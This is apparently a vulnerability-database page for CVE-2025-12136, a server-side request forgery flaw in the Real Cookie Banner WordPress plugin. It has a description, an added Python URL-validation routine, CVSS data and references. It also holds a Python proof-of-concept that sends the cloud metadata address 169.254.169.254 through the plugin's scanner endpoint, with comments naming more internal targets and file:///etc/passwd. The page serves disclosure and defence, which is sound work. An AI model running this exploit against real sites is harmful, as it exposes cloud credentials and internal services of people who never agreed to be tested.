Security Vulnerability Report
CVE-2025-12136 CVSS 6.8 MEDIUM

CVE-2025-12136

Published: 2025-10-24 10:15:38
Last Modified: 2026-04-15 00:35:42

Description

The Real Cookie Banner: GDPR & ePrivacy Cookie Consent plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 5.2.4. This is due to insufficient validation on the user-supplied URL in the '/scanner/scan-without-login' REST API endpoint. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services via the `url` parameter.
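The check the description says is missing, as an added example in Python (not the plugin's PHP code and not part of this report): a validator for a server-side scanner endpoint that accepts only http(s), rejects embedded credentials, and resolves the host so that every address it maps to is confirmed globally routable before the scanner fetches it. The FAKE_DNS table and fake_resolver are constructed for an offline demonstration; system_resolver is the real lookup a deployment would use.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # no file://, gopher://, ftp://, ...

def system_resolver(host):
    """Every address the name currently resolves to (A and AAAA records)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_public_address(addr):
    """Globally routable only: rejects loopback, RFC 1918, link-local (incl. 169.254.169.254), ULA, CGNAT."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:  # ::ffff:10.0.0.1 -> 10.0.0.1
        ip = ip.ipv4_mapped
    return ip.is_global

def validate_scan_url(url, resolver=system_resolver):
    """Return (ok, reason). The fetch that follows must connect to the vetted
    address itself; re-resolving the name later reopens DNS rebinding."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable URL"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = {str(ipaddress.ip_address(host))}  # literal IP: nothing to resolve
    except ValueError:                              # a name: vet every record it has
        try:
            addrs = resolver(host)
        except (socket.gaierror, UnicodeError):
            addrs = set()
    if not addrs:
        return False, "host does not resolve"
    bad = sorted(a for a in addrs if not is_public_address(a))
    if bad:
        return False, f"host resolves to non-public address {bad[0]}"
    return True, "ok"
# Constructed DNS table (not real records) so the demo runs offline.
FAKE_DNS = {"localhost": {"127.0.0.1", "::1"}, "www.example.com": {"93.184.216.34"},
            "split.example": {"93.184.216.34", "10.0.0.5"}}  # one private record suffices
def fake_resolver(host):  # offline stand-in for system_resolver
    return FAKE_DNS.get(host, set())
```

The same check has to be repeated for every redirect hop the scanner follows, since an approved public host can answer with a 302 to an internal address.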

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Real Cookie Banner plugin <= 5.2.4 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-12136 SSRF PoC
# Real Cookie Banner Plugin <= 5.2.4
# Requires administrator-level access
import requests

target_url = "http://target-wordpress-site.com"  # Target must have Real Cookie Banner plugin installed

# Construct the vulnerable endpoint
endpoint = "/wp-json/real-cookie-banner/v1/scanner/scan-without-login"
url = target_url + endpoint

# Target for SSRF (internal service, metadata, etc.)
ssrf_target = "http://169.254.169.254/latest/meta-data/"  # AWS metadata

# Prepare the POST request with SSRF payload
data = {
    "url": ssrf_target
}

# If authentication is required, include cookies/tokens
# headers = {
#     "Cookie": "wordpress_admin_cookie=...",
#     "Authorization": "Bearer ..."
# }

try:
    print(f"[*] Sending SSRF request to: {url}")
    print(f"[*] Target URL for SSRF: {ssrf_target}")
    response = requests.post(url, data=data, timeout=10)
    print(f"[+] Response Status: {response.status_code}")
    print(f"[+] Response Body:\n{response.text}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

# Alternative: Test with different SSRF targets
# Internal service: http://localhost:6379/ (Redis)
# File read: file:///etc/passwd
# Cloud metadata: http://169.254.169.254/latest/user-data/
```

References

https://infosecstuff.com/SSRF-Real-Cookie-Banner
https://owasp.org/www-community/attacks/Server_Side_Request_Forgery
https://plugins.trac.wordpress.org/browser/real-cookie-banner/trunk/inc/rest/Scanner.php#L210
https://plugins.trac.wordpress.org/browser/real-cookie-banner/trunk/inc/rest/Scanner.php#L223
https://plugins.trac.wordpress.org/browser/real-cookie-banner/trunk/inc/rest/Scanner.php#L48
https://plugins.trac.wordpress.org/changeset/3378727
https://www.wordfence.com/threat-intel/vulnerabilities/id/7f559d7f-3faf-4549-b529-f4db03dce2dd?source=cve

Record Metadata

Weakness: CWE-918 (Server-Side Request Forgery)
Vulnerability Status: Deferred
Exploitability Score: 2.3
Impact Score: 4.0